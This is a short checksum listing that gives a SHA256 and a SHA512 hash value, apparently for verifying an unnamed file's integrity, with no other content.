SHA256be09e0dfc1f94575577fb7fe7ee290163cedf2f62fb041b6ec88a9f4a0d4580d
SHA51264899ab81992531a585ca582c2e21e833fb8ebe4dc30551e0b61ba957aa044b9e456c8fa87f4952246d3fc8a944111ce7be36185faef81ae6e797fc07f0fcf00